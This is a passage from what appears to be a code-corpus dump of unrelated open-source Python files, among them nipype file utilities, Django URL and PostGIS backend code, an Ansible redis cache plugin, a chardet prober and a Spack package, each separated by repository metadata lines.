Characters to prepend to the filename
suffix : string
Characters to append to the filename
newpath : string
Path to replace the path of the input fname
use_ext : boolean
If True (default), appends the extension of the original file
to the output name.
Returns
-------
Absolute path of the modified filename
>>> from nipype.utils.filemanip import fname_presuffix
>>> fname = 'foo.nii.gz'
>>> fname_presuffix(fname,'pre','post','/tmp')
'/tmp/prefoopost.nii.gz'
"""
pth, fname, ext = split_filename(fname)
if not use_ext:
ext = ''
if newpath and isdefined(newpath):
pth = os.path.abspath(newpath)
return os.path.join(pth, prefix + fname + suffix + ext)
def fnames_presuffix(fnames, prefix='', suffix='', newpath=None, use_ext=True):
"""Calls fname_presuffix for a list of files.
"""
f2 = []
for fname in fnames:
f2.append(fname_presuffix(fname, prefix, suffix, newpath, use_ext))
return f2
def hash_rename(filename, hashvalue):
"""renames a file given original filename and hash
and sets path to output_directory
"""
path, name, ext = split_filename(filename)
newfilename = ''.join((name, '_0x', hashvalue, ext))
return os.path.join(path, newfilename)
def check_forhash(filename):
"""checks if file has a hash in its filename"""
if isinstance(filename, list):
filename = filename[0]
path, name = os.path.split(filename)
if re.search('(_0x[a-z0-9]{32})', name):
hashvalue = re.findall('(_0x[a-z0-9]{32})', name)
return True, hashvalue
else:
return False, None
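# Hedged illustration (added for clarity; not part of the upstream module):
# a minimal sketch of how hash_rename and check_forhash fit together. The
# path and hash value below are hypothetical.
def _example_hash_rename_roundtrip():
    hashed = hash_rename('/tmp/brain.nii.gz', 'a' * 32)
    # hashed == '/tmp/brain_0x' + 'a' * 32 + '.nii.gz'
    has_hash, found = check_forhash(hashed)
    # has_hash is True; found is a list holding the '_0x...' fragment
    return hashed, has_hash, found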
def hash_infile(afile, chunk_len=8192, crypto=hashlib.md5):
""" Computes hash of a file using 'crypto' module"""
hex = None
if os.path.isfile(afile):
crypto_obj = crypto()
fp = file(afile, 'rb')
while True:
data = fp.read(chunk_len)
if not data:
break
crypto_obj.update(data)
fp.close()
hex = crypto_obj.hexdigest()
return hex
def hash_timestamp(afile):
""" Computes md5 hash of the timestamp of a file """
md5hex = None
if os.path.isfile(afile):
md5obj = md5()
stat = os.stat(afile)
md5obj.update(str(stat.st_size))
md5obj.update(str(stat.st_mtime))
md5hex = md5obj.hexdigest()
return md5hex
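# Hedged sketch (added; not in the original file): hash_timestamp never reads
# the file contents -- it hashes only the size and mtime from os.stat -- so it
# is cheap but changes whenever the file is touched, whereas hash_infile
# digests the actual bytes. The path is hypothetical.
def _example_timestamp_vs_content(path='/tmp/data.nii'):
    cheap = hash_timestamp(path)     # md5 of str(size) + str(mtime)
    thorough = hash_infile(path)     # md5 of the file's bytes
    return cheap, thorough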
def copyfile(originalfile, newfile, copy=False, create_new=False,
hashmethod=None):
"""Copy or symlink ``originalfile`` to ``newfile``.
Parameters
----------
originalfile : str
full path to original file
newfile : str
full path to new file
copy : Bool
specifies whether to copy or symlink files
(default=False) but only for POSIX systems
Returns
-------
None
"""
newhash = None
orighash = None
fmlogger.debug(newfile)
if create_new:
while os.path.exists(newfile):
base, fname, ext = split_filename(newfile)
s = re.search('_c[0-9]{4,4}$', fname)
i = 0
if s:
i = int(s.group()[2:])+1
fname = fname[:-6] + "_c%04d" % i
else:
fname += "_c%04d" % i
newfile = base + os.sep + fname + ext
if hashmethod is None:
hashmethod = config.get('execution', 'hash_method').lower()
elif os.path.exists(newfile):
if hashmethod == 'timestamp':
newhash = hash_timestamp(newfile)
elif hashmethod == 'content':
newhash = hash_infile(newfile)
fmlogger.debug("File: %s already exists,%s, copy:%d"
% (newfile, newhash, copy))
#the following seems unnecessary
#if os.name is 'posix' and copy:
# if os.path.lexists(newfile) and os.path.islink(newfile):
# os.unlink(newfile)
# newhash = None
    if os.name == 'posix' and not copy:
if os.path.lexists(newfile):
if hashmethod == 'timestamp':
orighash = hash_timestamp(originalfile)
elif hashmethod == 'content':
orighash = hash_infile(originalfile)
fmlogger.debug('Original hash: %s, %s' % (originalfile, orighash))
if newhash != orighash:
os.unlink(newfile)
if (newhash is None) or (newhash != orighash):
os.symlink(originalfile, newfile)
else:
if newhash:
if hashmethod == 'timestamp':
orighash = hash_timestamp(originalfile)
elif hashmethod == 'content':
orighash = hash_infile(originalfile)
if (newhash is None) or (newhash != orighash):
try:
fmlogger.debug("Copying File: %s->%s" % (newfile, originalfile))
shutil.copyfile(originalfile, newfile)
except shutil.Error, e:
fmlogger.warn(e.message)
else:
fmlogger.debug("File: %s already exists, not overwriting, copy:%d"
% (newfile, copy))
if originalfile.endswith(".img"):
hdrofile = originalfile[:-4] + ".hdr"
hdrnfile = newfile[:-4] + ".hdr"
matofile = originalfile[:-4] + ".mat"
if os.path.exists(matofile):
matnfile = newfile[:-4] + ".mat"
copyfile(matofile, matnfile, copy)
copyfile(hdrofile, hdrnfile, copy)
elif originalfile.endswith(".BRIK"):
hdrofile = originalfile[:-4] + ".HEAD"
hdrnfile = newfile[:-4] + ".HEAD"
copyfile(hdrofile, hdrnfile, copy)
return newfile
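# Hedged usage sketch (added; paths are hypothetical): with copy=False on a
# POSIX system copyfile symlinks instead of copying, and create_new=True
# appends a '_cNNNN' counter instead of overwriting an existing target.
def _example_copyfile():
    link = copyfile('/data/subject.nii', '/tmp/subject.nii', copy=False)
    fresh = copyfile('/data/subject.nii', '/tmp/subject.nii', create_new=True)
    # fresh would be '/tmp/subject_c0000.nii' when '/tmp/subject.nii' exists
    return link, fresh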
def get_related_files(filename):
"""Returns a list of related files for Nifti-Pair, Analyze (SPM) and AFNI
files
"""
related_files = []
if filename.endswith(".img") or filename.endswith(".hdr"):
path, name, ext = split_filename(filename)
for ext in ['.hdr', '.img', '.mat']:
related_files.append(os.path.join(path, name + ext))
elif filename.endswith(".BRIK") or filename.endswith(".HEAD"):
path, name, ext = split_filename(filename)
for ext in ['.BRIK', '.HEAD']:
related_files.append(os.path.join(path, name + ext))
if not len(related_files):
related_files = [filename]
return related_files
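# Hedged example (added; not part of the upstream module): for an Analyze
# image pair the companion header and mat files are returned alongside the
# input. The path is hypothetical.
def _example_get_related_files():
    related = get_related_files('/data/subject.img')
    # -> ['/data/subject.hdr', '/data/subject.img', '/data/subject.mat']
    return related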
def copyfiles(filelist, dest, copy=False, create_new=False):
"""Copy or symlink files in ``filelist`` to ``dest`` directory.
Parameters
----------
filelist : list
List of files to copy.
dest : path/files
full path to destination. If it is a list of length greater
than 1, then it assumes that these are the names of the new
files.
copy : Bool
specifies whether to copy or symlink files
(default=False) but only for posix systems
Returns
-------
None
"""
outfiles = filename_to_list(dest)
newfiles = []
for i, f in enumerate(filename_to_list(filelist)):
if isinstance(f, list):
newfiles.insert(i, copyfiles(f, dest, copy=copy,
create_new=create_new))
else:
if len(outfiles) > 1:
destfile = outfiles[i]
else:
destfile = fname_presuffix(f, newpath=outfiles[0])
destfile = copyfile(f, destfile, copy, create_new=create_new)
newfiles.insert(i, destfile)
return newfiles
def filename_to_list(filename):
"""Returns a list given either a string or a list
"""
if isinstance(filename, (str, unicode)):
return [filename]
elif isinstance(filename, list):
return filename
elif is_container(filename):
return [x for x in filename]
else:
return None
def list_to_filename(filelist):
"""Returns a list if filelist is a list of length greater than 1,
otherwise returns the first element
"""
if len(filelist) > 1:
return filelist
else:
return filelist[0]
def save_json(filename, data):
"""Save data to a json file
Parameters
----------
filename : str
Filename to save data in.
data : dict
Dictionary to save in json file.
"""
fp = file(filename, 'w')
json.dump(data, fp, sort_keys=True, indent=4)
fp.close()
def load_json(filename):
"""Load data from a json file
Parameters
----------
filename : str
Filename to load data from.
Returns
-------
data : dict
"""
fp = file(filename, 'r')
data = json.load(fp)
fp.close()
return data
def loadcrash(infile, *args):
if '.pkl' in infile:
return loadpkl(infile)
elif '.npz' in infile:
        warnings.warn('npz files will be deprecated in the next '
                      'release. you can use numpy to open them.',
                      DeprecationWarning)
data = np.load(infile)
out = {}
for k in data.files:
out[k] = [f for f in data[k].flat]
if len(out[k]) == 1:
out[k] = out[k].pop()
return out
else:
raise ValueError('Only pickled crashfiles are supported')
def loadpkl(infile):
"""Load a zipped or plain cPickled file
"""
if infile.endswith('pklz'):
pkl_file = gzip.open(infile, 'rb')
else:
pkl_file = open(infile)
return cPickle.load(pkl_file)
def savepkl(filename, record):
if filename.endswith('pklz'):
pkl_file = gzip.open(filename, 'wb')
else:
pkl_file = open(filename, 'wb')
cPickle.dump(record, pkl_file)
pkl_file.close()
rst_levels = ['=', '-', '~', '+']
def write_rst_header(header, level=0):
return '\n'.join((header, ''.join([rst_levels[level]
for _ in header]))) + '\n\n'
def write_rst_list(items, prefix=''):
out = []
for item in items:
out.append(prefix + ' ' + str(item))
return '\n'.join(out)+'\n\n'
def write_rst_dict(info, prefix=''):
out = []
for key, value in sorted(info.items()):
out.append(prefix + '* ' + key + ' : ' + str(value))
return '\n'.join(out)+'\n\n'
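# Hedged worked example (added): write_rst_header('Inputs', level=1) returns
# 'Inputs\n------\n\n' -- one underline character per character of the header
# -- and write_rst_dict({'a': 1}) renders a single '* a : 1' bullet line.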
| bsd-3-clause |
cgstudiomap/cgstudiomap | main/eggs/Django-1.9-py2.7.egg/django/core/checks/urls.py | 110 | 2727 | from __future__ import unicode_literals
from . import Tags, Warning, register
@register(Tags.urls)
def check_url_config(app_configs, **kwargs):
from django.core.urlresolvers import get_resolver
resolver = get_resolver()
return check_resolver(resolver)
def check_resolver(resolver):
"""
Recursively check the resolver.
"""
from django.core.urlresolvers import RegexURLPattern, RegexURLResolver
warnings = []
for pattern in resolver.url_patterns:
if isinstance(pattern, RegexURLResolver):
warnings.extend(check_include_trailing_dollar(pattern))
# Check resolver recursively
warnings.extend(check_resolver(pattern))
elif isinstance(pattern, RegexURLPattern):
warnings.extend(check_pattern_name(pattern))
warnings.extend(check_pattern_startswith_slash(pattern))
return warnings
def describe_pattern(pattern):
"""
Format the URL pattern for display in warning messages.
"""
description = "'{}'".format(pattern.regex.pattern)
if getattr(pattern, 'name', False):
description += " [name='{}']".format(pattern.name)
return description
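# Hedged illustration (added; the view callable and name are placeholders):
# a sketch of the string describe_pattern produces for a named pattern.
def _example_describe_pattern():
    from django.conf.urls import url
    pattern = url(r'^articles/$', lambda request: None, name='articles-list')
    return describe_pattern(pattern)
    # -> "'^articles/$' [name='articles-list']"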
def check_include_trailing_dollar(pattern):
"""
Check that include is not used with a regex ending with a dollar.
"""
regex_pattern = pattern.regex.pattern
if regex_pattern.endswith('$') and not regex_pattern.endswith('\$'):
warning = Warning(
"Your URL pattern {} uses include with a regex ending with a '$'. "
"Remove the dollar from the regex to avoid problems including "
"URLs.".format(describe_pattern(pattern)),
id="urls.W001",
)
return [warning]
else:
return []
def check_pattern_startswith_slash(pattern):
"""
Check that the pattern does not begin with a forward slash.
"""
regex_pattern = pattern.regex.pattern
if regex_pattern.startswith('/') or regex_pattern.startswith('^/'):
warning = Warning(
"Your URL pattern {} has a regex beginning with a '/'. "
"Remove this slash as it is unnecessary.".format(describe_pattern(pattern)),
id="urls.W002",
)
return [warning]
else:
return []
def check_pattern_name(pattern):
"""
Check that the pattern name does not contain a colon.
"""
if pattern.name is not None and ":" in pattern.name:
warning = Warning(
"Your URL pattern {} has a name including a ':'. Remove the colon, to "
"avoid ambiguous namespace references.".format(describe_pattern(pattern)),
id="urls.W003",
)
return [warning]
else:
return []
| agpl-3.0 |
Slezhuk/ansible | lib/ansible/plugins/cache/redis.py | 36 | 3530 | # (c) 2014, Brian Coca, Josh Drake, et al
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import sys
import time
import json
from ansible import constants as C
from ansible.errors import AnsibleError
from ansible.plugins.cache import BaseCacheModule
try:
from redis import StrictRedis
except ImportError:
raise AnsibleError("The 'redis' python module is required for the redis fact cache, 'pip install redis'")
class CacheModule(BaseCacheModule):
"""
A caching module backed by redis.
Keys are maintained in a zset with their score being the timestamp
when they are inserted. This allows for the usage of 'zremrangebyscore'
    to expire keys. This mechanism is used instead of a pattern-matched 'scan' for
performance.
"""
def __init__(self, *args, **kwargs):
if C.CACHE_PLUGIN_CONNECTION:
connection = C.CACHE_PLUGIN_CONNECTION.split(':')
else:
connection = []
self._timeout = float(C.CACHE_PLUGIN_TIMEOUT)
self._prefix = C.CACHE_PLUGIN_PREFIX
self._cache = StrictRedis(*connection)
self._keys_set = 'ansible_cache_keys'
def _make_key(self, key):
return self._prefix + key
def get(self, key):
value = self._cache.get(self._make_key(key))
# guard against the key not being removed from the zset;
# this could happen in cases where the timeout value is changed
# between invocations
if value is None:
self.delete(key)
raise KeyError
return json.loads(value)
def set(self, key, value):
value2 = json.dumps(value)
if self._timeout > 0: # a timeout of 0 is handled as meaning 'never expire'
self._cache.setex(self._make_key(key), int(self._timeout), value2)
else:
self._cache.set(self._make_key(key), value2)
self._cache.zadd(self._keys_set, time.time(), key)
def _expire_keys(self):
if self._timeout > 0:
expiry_age = time.time() - self._timeout
self._cache.zremrangebyscore(self._keys_set, 0, expiry_age)
def keys(self):
self._expire_keys()
return self._cache.zrange(self._keys_set, 0, -1)
def contains(self, key):
self._expire_keys()
return (self._cache.zrank(self._keys_set, key) >= 0)
def delete(self, key):
self._cache.delete(self._make_key(key))
self._cache.zrem(self._keys_set, key)
def flush(self):
for key in self.keys():
self.delete(key)
def copy(self):
# TODO: there is probably a better way to do this in redis
ret = dict()
for key in self.keys():
ret[key] = self.get(key)
return ret
def __getstate__(self):
return dict()
def __setstate__(self, data):
self.__init__()
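# Hedged usage sketch (added; not part of the upstream plugin): assuming a
# reachable redis at the default address and a prefix such as 'ansible_facts',
# each cached host becomes two entries -- a plain key holding the JSON blob
# and a member of the 'ansible_cache_keys' zset scored by insertion time,
# which _expire_keys later trims with zremrangebyscore. The host and fact
# below are hypothetical.
def _example_cache_roundtrip():
    cache = CacheModule()
    cache.set('web1', {'ansible_os_family': 'Debian'})
    return cache.get('web1') if cache.contains('web1') else None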
| gpl-3.0 |
Dingmatt/AMSA | Plug-ins/Amsa.bundle/Contents/Libraries/Shared/chardet/utf8prober.py | 290 | 2766 | ######################## BEGIN LICENSE BLOCK ########################
# The Original Code is mozilla.org code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 1998
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
from .charsetprober import CharSetProber
from .enums import ProbingState, MachineState
from .codingstatemachine import CodingStateMachine
from .mbcssm import UTF8_SM_MODEL
class UTF8Prober(CharSetProber):
ONE_CHAR_PROB = 0.5
def __init__(self):
super(UTF8Prober, self).__init__()
self.coding_sm = CodingStateMachine(UTF8_SM_MODEL)
self._num_mb_chars = None
self.reset()
def reset(self):
super(UTF8Prober, self).reset()
self.coding_sm.reset()
self._num_mb_chars = 0
@property
def charset_name(self):
return "utf-8"
@property
def language(self):
return ""
def feed(self, byte_str):
for c in byte_str:
coding_state = self.coding_sm.next_state(c)
if coding_state == MachineState.ERROR:
self._state = ProbingState.NOT_ME
break
elif coding_state == MachineState.ITS_ME:
self._state = ProbingState.FOUND_IT
break
elif coding_state == MachineState.START:
if self.coding_sm.get_current_charlen() >= 2:
self._num_mb_chars += 1
if self.state == ProbingState.DETECTING:
if self.get_confidence() > self.SHORTCUT_THRESHOLD:
self._state = ProbingState.FOUND_IT
return self.state
def get_confidence(self):
unlike = 0.99
if self._num_mb_chars < 6:
unlike *= self.ONE_CHAR_PROB ** self._num_mb_chars
return 1.0 - unlike
else:
return unlike
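# Hedged worked example (added): with ONE_CHAR_PROB = 0.5, the two multi-byte
# characters below give a confidence of 1 - 0.99 * 0.5**2 = 0.7525, and six
# or more multi-byte sequences cap the confidence at 0.99.
def _example_confidence_growth():
    prober = UTF8Prober()
    prober.feed(bytearray(u'h\xe9llo w\xf6rld'.encode('utf-8')))
    return prober.charset_name, prober.get_confidence()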
| gpl-3.0 |
fhartwig/adhocracy3.mercator | src/adhocracy_core/adhocracy_core/resources/test_simple.py | 2 | 1213 | from pyramid import testing
from pytest import fixture
from pytest import mark
def test_simple_meta():
import adhocracy_core.sheets
from .simple import simple_meta
from .simple import ISimple
meta = simple_meta
assert meta.iresource is ISimple
assert meta.basic_sheets == (adhocracy_core.sheets.name.IName,
adhocracy_core.sheets.title.ITitle,
adhocracy_core.sheets.metadata.IMetadata,
adhocracy_core.sheets.workflow.IWorkflowAssignment,
)
assert meta.permission_create == 'create_simple'
@mark.usefixtures('integration')
class TestSimple:
@fixture
def context(self, pool):
return pool
def test_create_simple(self, context, registry):
from adhocracy_core.resources.simple import ISimple
from adhocracy_core.sheets.name import IName
appstructs = {IName.__identifier__: {'name': 'name1'}}
res = registry.content.create(ISimple.__identifier__,
appstructs=appstructs,
parent=context)
assert ISimple.providedBy(res)
| agpl-3.0 |
lgarren/spack | var/spack/repos/builtin/packages/htop/package.py | 3 | 1705 | ##############################################################################
# Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/llnl/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class Htop(AutotoolsPackage):
"""htop is an interactive text-mode process viewer for Unix systems."""
homepage = "https://github.com/hishamhm/htop"
url = "https://hisham.hm/htop/releases/2.0.2/htop-2.0.2.tar.gz"
list_url = "https://hisham.hm/htop/releases"
list_depth = 1
version('2.0.2', '7d354d904bad591a931ad57e99fea84a')
depends_on('ncurses')
def configure_args(self):
return ['--enable-shared']
| lgpl-2.1 |
elky/django | django/contrib/gis/db/backends/postgis/operations.py | 5 | 15946 | import re
from django.conf import settings
from django.contrib.gis.db.backends.base.operations import (
BaseSpatialOperations,
)
from django.contrib.gis.db.backends.utils import SpatialOperator
from django.contrib.gis.db.models import GeometryField, RasterField
from django.contrib.gis.gdal import GDALRaster
from django.contrib.gis.geos.geometry import GEOSGeometryBase
from django.contrib.gis.geos.prototypes.io import wkb_r
from django.contrib.gis.measure import Distance
from django.core.exceptions import ImproperlyConfigured
from django.db.backends.postgresql.operations import DatabaseOperations
from django.db.models import Func, Value
from django.db.utils import ProgrammingError
from django.utils.functional import cached_property
from django.utils.version import get_version_tuple
from .adapter import PostGISAdapter
from .models import PostGISGeometryColumns, PostGISSpatialRefSys
from .pgraster import from_pgraster
# Identifier to mark raster lookups as bilateral.
BILATERAL = 'bilateral'
class PostGISOperator(SpatialOperator):
def __init__(self, geography=False, raster=False, **kwargs):
# Only a subset of the operators and functions are available for the
# geography type.
self.geography = geography
# Only a subset of the operators and functions are available for the
        # raster type. Lookups that don't support raster will be converted to
# polygons. If the raster argument is set to BILATERAL, then the
# operator cannot handle mixed geom-raster lookups.
self.raster = raster
super().__init__(**kwargs)
def as_sql(self, connection, lookup, template_params, *args):
if lookup.lhs.output_field.geography and not self.geography:
raise ValueError('PostGIS geography does not support the "%s" '
'function/operator.' % (self.func or self.op,))
template_params = self.check_raster(lookup, template_params)
return super().as_sql(connection, lookup, template_params, *args)
def check_raster(self, lookup, template_params):
spheroid = lookup.rhs_params and lookup.rhs_params[-1] == 'spheroid'
# Check which input is a raster.
lhs_is_raster = lookup.lhs.field.geom_type == 'RASTER'
rhs_is_raster = isinstance(lookup.rhs, GDALRaster)
# Look for band indices and inject them if provided.
if lookup.band_lhs is not None and lhs_is_raster:
if not self.func:
raise ValueError('Band indices are not allowed for this operator, it works on bbox only.')
template_params['lhs'] = '%s, %s' % (template_params['lhs'], lookup.band_lhs)
if lookup.band_rhs is not None and rhs_is_raster:
if not self.func:
raise ValueError('Band indices are not allowed for this operator, it works on bbox only.')
template_params['rhs'] = '%s, %s' % (template_params['rhs'], lookup.band_rhs)
# Convert rasters to polygons if necessary.
if not self.raster or spheroid:
# Operators without raster support.
if lhs_is_raster:
template_params['lhs'] = 'ST_Polygon(%s)' % template_params['lhs']
if rhs_is_raster:
template_params['rhs'] = 'ST_Polygon(%s)' % template_params['rhs']
elif self.raster == BILATERAL:
# Operators with raster support but don't support mixed (rast-geom)
# lookups.
if lhs_is_raster and not rhs_is_raster:
template_params['lhs'] = 'ST_Polygon(%s)' % template_params['lhs']
elif rhs_is_raster and not lhs_is_raster:
template_params['rhs'] = 'ST_Polygon(%s)' % template_params['rhs']
return template_params
class ST_Polygon(Func):
function = 'ST_Polygon'
def __init__(self, expr):
super().__init__(expr)
expr = self.source_expressions[0]
if isinstance(expr, Value) and not expr._output_field_or_none:
self.source_expressions[0] = Value(expr.value, output_field=RasterField(srid=expr.value.srid))
@cached_property
def output_field(self):
return GeometryField(srid=self.source_expressions[0].field.srid)
class PostGISOperations(BaseSpatialOperations, DatabaseOperations):
name = 'postgis'
postgis = True
geography = True
geom_func_prefix = 'ST_'
Adapter = PostGISAdapter
collect = geom_func_prefix + 'Collect'
extent = geom_func_prefix + 'Extent'
extent3d = geom_func_prefix + '3DExtent'
length3d = geom_func_prefix + '3DLength'
makeline = geom_func_prefix + 'MakeLine'
perimeter3d = geom_func_prefix + '3DPerimeter'
unionagg = geom_func_prefix + 'Union'
gis_operators = {
'bbcontains': PostGISOperator(op='~', raster=True),
'bboverlaps': PostGISOperator(op='&&', geography=True, raster=True),
'contained': PostGISOperator(op='@', raster=True),
'overlaps_left': PostGISOperator(op='&<', raster=BILATERAL),
'overlaps_right': PostGISOperator(op='&>', raster=BILATERAL),
'overlaps_below': PostGISOperator(op='&<|'),
'overlaps_above': PostGISOperator(op='|&>'),
'left': PostGISOperator(op='<<'),
'right': PostGISOperator(op='>>'),
'strictly_below': PostGISOperator(op='<<|'),
'strictly_above': PostGISOperator(op='|>>'),
'same_as': PostGISOperator(op='~=', raster=BILATERAL),
'exact': PostGISOperator(op='~=', raster=BILATERAL), # alias of same_as
'contains': PostGISOperator(func='ST_Contains', raster=BILATERAL),
'contains_properly': PostGISOperator(func='ST_ContainsProperly', raster=BILATERAL),
'coveredby': PostGISOperator(func='ST_CoveredBy', geography=True, raster=BILATERAL),
'covers': PostGISOperator(func='ST_Covers', geography=True, raster=BILATERAL),
'crosses': PostGISOperator(func='ST_Crosses'),
'disjoint': PostGISOperator(func='ST_Disjoint', raster=BILATERAL),
'equals': PostGISOperator(func='ST_Equals'),
'intersects': PostGISOperator(func='ST_Intersects', geography=True, raster=BILATERAL),
'overlaps': PostGISOperator(func='ST_Overlaps', raster=BILATERAL),
'relate': PostGISOperator(func='ST_Relate'),
'touches': PostGISOperator(func='ST_Touches', raster=BILATERAL),
'within': PostGISOperator(func='ST_Within', raster=BILATERAL),
'dwithin': PostGISOperator(func='ST_DWithin', geography=True, raster=BILATERAL),
}
unsupported_functions = set()
select = '%s::bytea'
select_extent = None
@cached_property
def function_names(self):
function_names = {
'BoundingCircle': 'ST_MinimumBoundingCircle',
'NumPoints': 'ST_NPoints',
}
if self.spatial_version < (2, 2, 0):
function_names.update({
'DistanceSphere': 'ST_distance_sphere',
'DistanceSpheroid': 'ST_distance_spheroid',
'LengthSpheroid': 'ST_length_spheroid',
'MemSize': 'ST_mem_size',
})
return function_names
@cached_property
def spatial_version(self):
"""Determine the version of the PostGIS library."""
# Trying to get the PostGIS version because the function
# signatures will depend on the version used. The cost
# here is a database query to determine the version, which
# can be mitigated by setting `POSTGIS_VERSION` with a 3-tuple
# comprising user-supplied values for the major, minor, and
# subminor revision of PostGIS.
if hasattr(settings, 'POSTGIS_VERSION'):
version = settings.POSTGIS_VERSION
else:
# Run a basic query to check the status of the connection so we're
# sure we only raise the error below if the problem comes from
# PostGIS and not from PostgreSQL itself (see #24862).
self._get_postgis_func('version')
try:
vtup = self.postgis_version_tuple()
except ProgrammingError:
raise ImproperlyConfigured(
'Cannot determine PostGIS version for database "%s" '
'using command "SELECT postgis_lib_version()". '
'GeoDjango requires at least PostGIS version 2.1. '
'Was the database created from a spatial database '
'template?' % self.connection.settings_dict['NAME']
)
version = vtup[1:]
return version
def convert_extent(self, box):
"""
Return a 4-tuple extent for the `Extent` aggregate by converting
the bounding box text returned by PostGIS (`box` argument), for
example: "BOX(-90.0 30.0, -85.0 40.0)".
"""
if box is None:
return None
ll, ur = box[4:-1].split(',')
xmin, ymin = map(float, ll.split())
xmax, ymax = map(float, ur.split())
return (xmin, ymin, xmax, ymax)
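    # Hedged worked example (added for clarity): for box equal to
    # 'BOX(-90.0 30.0,-85.0 40.0)', the slice box[4:-1] is
    # '-90.0 30.0,-85.0 40.0' and convert_extent returns
    # (-90.0, 30.0, -85.0, 40.0).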
def convert_extent3d(self, box3d):
"""
Return a 6-tuple extent for the `Extent3D` aggregate by converting
the 3d bounding-box text returned by PostGIS (`box3d` argument), for
example: "BOX3D(-90.0 30.0 1, -85.0 40.0 2)".
"""
if box3d is None:
return None
ll, ur = box3d[6:-1].split(',')
xmin, ymin, zmin = map(float, ll.split())
xmax, ymax, zmax = map(float, ur.split())
return (xmin, ymin, zmin, xmax, ymax, zmax)
def geo_db_type(self, f):
"""
Return the database field type for the given spatial field.
"""
if f.geom_type == 'RASTER':
return 'raster'
# Type-based geometries.
# TODO: Support 'M' extension.
if f.dim == 3:
geom_type = f.geom_type + 'Z'
else:
geom_type = f.geom_type
if f.geography:
if f.srid != 4326:
raise NotImplementedError('PostGIS only supports geography columns with an SRID of 4326.')
return 'geography(%s,%d)' % (geom_type, f.srid)
else:
return 'geometry(%s,%d)' % (geom_type, f.srid)
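    # Hedged illustration (added): a 2D point field with srid 4326 maps to
    # 'geometry(POINT,4326)', the same field with geography=True maps to
    # 'geography(POINT,4326)', and a 3D point field becomes
    # 'geometry(POINTZ,4326)'.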
def get_distance(self, f, dist_val, lookup_type):
"""
Retrieve the distance parameters for the given geometry field,
distance lookup value, and the distance lookup type.
This is the most complex implementation of the spatial backends due to
what is supported on geodetic geometry columns vs. what's available on
projected geometry columns. In addition, it has to take into account
the geography column type.
"""
# Getting the distance parameter
value = dist_val[0]
# Shorthand boolean flags.
geodetic = f.geodetic(self.connection)
geography = f.geography
if isinstance(value, Distance):
if geography:
dist_param = value.m
elif geodetic:
if lookup_type == 'dwithin':
raise ValueError('Only numeric values of degree units are '
'allowed on geographic DWithin queries.')
dist_param = value.m
else:
dist_param = getattr(value, Distance.unit_attname(f.units_name(self.connection)))
else:
# Assuming the distance is in the units of the field.
dist_param = value
return [dist_param]
def get_geom_placeholder(self, f, value, compiler):
"""
Provide a proper substitution value for Geometries or rasters that are
not in the SRID of the field. Specifically, this routine will
substitute in the ST_Transform() function call.
"""
tranform_func = self.spatial_function_name('Transform')
if hasattr(value, 'as_sql'):
if value.field.srid == f.srid:
placeholder = '%s'
else:
placeholder = '%s(%%s, %s)' % (tranform_func, f.srid)
return placeholder
# Get the srid for this object
if value is None:
value_srid = None
else:
value_srid = value.srid
# Adding Transform() to the SQL placeholder if the value srid
# is not equal to the field srid.
if value_srid is None or value_srid == f.srid:
placeholder = '%s'
else:
placeholder = '%s(%%s, %s)' % (tranform_func, f.srid)
return placeholder
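    # Hedged illustration (added): when the value's srid differs from the
    # field srid (say a value in 3857 against a 4326 column), the placeholder
    # becomes 'ST_Transform(%s, 4326)'; matching srids fall back to a plain
    # '%s'.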
def _get_postgis_func(self, func):
"""
Helper routine for calling PostGIS functions and returning their result.
"""
# Close out the connection. See #9437.
with self.connection.temporary_connection() as cursor:
cursor.execute('SELECT %s()' % func)
return cursor.fetchone()[0]
def postgis_geos_version(self):
"Return the version of the GEOS library used with PostGIS."
return self._get_postgis_func('postgis_geos_version')
def postgis_lib_version(self):
"Return the version number of the PostGIS library used with PostgreSQL."
return self._get_postgis_func('postgis_lib_version')
def postgis_proj_version(self):
"Return the version of the PROJ.4 library used with PostGIS."
return self._get_postgis_func('postgis_proj_version')
def postgis_version(self):
"Return PostGIS version number and compile-time options."
return self._get_postgis_func('postgis_version')
def postgis_full_version(self):
"Return PostGIS version number and compile-time options."
return self._get_postgis_func('postgis_full_version')
def postgis_version_tuple(self):
"""
Return the PostGIS version as a tuple (version string, major,
minor, subminor).
"""
version = self.postgis_lib_version()
return (version,) + get_version_tuple(version)
def proj_version_tuple(self):
"""
Return the version of PROJ.4 used by PostGIS as a tuple of the
major, minor, and subminor release numbers.
"""
